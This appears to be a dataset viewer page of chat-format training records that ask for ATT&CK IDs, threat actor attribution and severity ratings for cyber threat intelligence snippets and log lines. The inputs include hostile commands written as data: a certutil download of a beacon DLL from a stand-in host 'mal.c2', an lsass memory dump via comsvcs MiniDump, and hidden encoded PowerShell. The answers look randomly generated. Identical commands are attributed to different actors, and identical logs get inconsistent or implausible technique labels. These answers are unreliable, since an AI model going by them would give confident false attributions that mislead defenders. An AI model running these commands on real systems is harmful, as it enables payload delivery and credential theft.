messages listlengths 2 2 |
|---|
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\": \"High\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3980 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: HOPLIGHT has been observed loading several APIs associated with Pass the Hash.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0008\"], \"techniques\": [\"T1550.002\", \"T1550\"]}",
"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 784 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidence\":... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3909 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.184.247.173",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0001\", \"TA0006\"], \"tec... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-RRZDET6987)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Exfiltration, Command and Control",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confid... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 677 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.29.204.103",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0008\"], \"techniques\"... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Ke3chang has used keyloggers.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1056.001\", \"T1056\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.",
"ro... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-GCP1EZLD8E)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Command and Control, Collection, Credential Access",
"role": "user"
},
{
... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.121.100.80",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0009\"], \"techniques\": [\"T1071.00... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-HW1UYM6SPP)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control, Reconnaissance",
"role": "user"
},
{
"conten... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.139.99.88",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-J04P43NPSS)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": \"Hig... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.67.218.232",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0043\", \"TA000... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-0QN4CDA019)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Initial Access, Persistence",
"role": "user"
},
... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Threat Group-3390 obtained a KeePass database from a compromised host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1555.005\", \"T1555\"]}",
"role": "assistant"
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"conf... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Pan... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-AUZX4PCA32)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Impact",
"role": "user"
},
{
"content": "{\"severity\": \"Ex... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: DC replication will naturally take place every 15 minutes but can be triggered by an adversary or by legitimate urgent changes (ex: passwords).",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"te... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"con... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.151.110.122",
"role": "user"
},
{
"content": "{\"tactics\": [... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-DSXEUGAH1Y)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Lateral Movement, Exfiltration",
"role": "user"
},
... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Ajax Security Team has used FireMalv custom-developed malware, which collected passwords from the Firefox browser storage.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"con... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-TX2TG2Y3DA)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Lateral Movement",
"role": "user"
},
{
"c... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-HSDHTYYHVZ)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Initial Access, Collection, Discovery",
"role": "user"
},
{
"content"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.16.39.99",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA00... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3803 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.101.24.73",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA000... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036.... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confi... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-5PNH70XZ3A)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Defense Evasion, Discovery, Lateral Movement",
"role": "user"
},
{
"content"... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Compromised email accounts can also be used in the acquisition of infrastructure (ex: Domains).",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1586.002\", \"T1586\"]}",
"role": "assist... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Epic encrypts commands from the C2 server using a hardcoded key.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1270 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.136.245.62",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0002\", \"TA0007\"], \"te... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Comnie continues to load an embedded bitmap (BMP) file and decrypt data at offset 0x512",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoo... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confide... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.165.179.120",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0006\", \"TA001... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-8P9DAH6I2X)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"s... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confide... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: EvilBunny has downloaded additional Lua scripts from the C2.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.28.225.188",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-SCUPJQEUTC)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Lateral Movement, Discovery",
"role": "user"
},
{
... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Mis-Type uses cmd.exe to run commands for enumerating the host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-UVK8YSFZFV)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Credential Access",
"role": "user"
},
{
"content": "{\"severity\... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The Duqu command and control protocol's data stream can be encrypted with AES-CBC.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1633 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confid... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.109.190.79",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\"], \"techniques\": [... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-NVK3GTQKSX)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Discovery",
"role": "user"
},
{
"content": "{\"severity\": \"High\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for the activation or invocation of a container (ex: docker start or docker restart)",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204\"]}",
"role": "assistant"
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-1TADCDEHVZ)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution, Collection",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"co... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-W8C1NJXBMC)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Execution",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: DRATzarus can be partly encrypted with XOR.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-XDMKT0Q5FP)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\":... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.122.182.82",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-6G2Y1T63MA)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Execution, Exfiltration",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-9CYZXC26GL)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Credential Access, Initial Access",
"role": "user"
},
{
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor events for changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: GOLD SOUTHFIELD has conducted malicious spam (malspam) campaigns to gain access to victim's machines.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1566\"]}",
"role... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2999 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.17.85.59",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0040\",... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"confide... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 661 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"co... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spid... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"c... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Use application control to mitigate installation and use of unapproved software that can be used for remote access.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1219\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"c... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2368 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.55.83.91",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0001\", \"TA0009\"], \"techniq... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2427 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"conf... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"conf... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: load additional modules",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1129\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Any crontab files are stored in operating system-specific file paths.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"], \"techniques\": [\"T1053\", \"T1053.003\"]}",
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, TLS, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", ... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: SLOTHFULMEDIA has uploaded files and information from victim machines.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1005\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: APT32 has disguised a Cobalt Strike beacon as a Flash Installer.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Dtrack has used a dropper that embeds an encrypted payload as extra data.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flow ( snmp traffic originating from unauthorized or untrusted hosts, signature detecti... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.179.92.103",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T10... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may also use the same icon of the file they are trying to mimic.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036.005\", \"T1036\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-Y2MWMKE1M1)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Collection, Exfiltration",
"role": "user"
},
{
"content": "... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-E6093B0R89)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Reconnaissance",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"c... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3314 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.191.133.195",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1531\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"conf... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"conf... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-TC3HKQ38CB)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Credential Access",
"role": "user"
},
{
"content": "{\"severit... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Pupy can list local and remote shared drives and folders over SMB.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1135\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2165 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.164.41.51",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\",... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: ShadowPad has used DNS tunneling for C2 communications.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071.004\", \"T1071\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Olympic Destroyer uses Windows Management Instrumentation to enumerate all systems in the network.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1018\"]}",
"role": ... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: The event logs can be cleared with the following utility commands:",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confid... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements.",
"role": "user"
},
{
"content... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-G3OLTCIDIB)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Defense Evasion",
"role": "user"
},
{
"content": "{\"severity\... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.122.50.239",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0002\"], \"techniques\... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Pony has attempted to lure targets into downloading an attached executable (ZIP, RAR, or CAB archives) or document (PDF or other MS Office format).",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], ... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.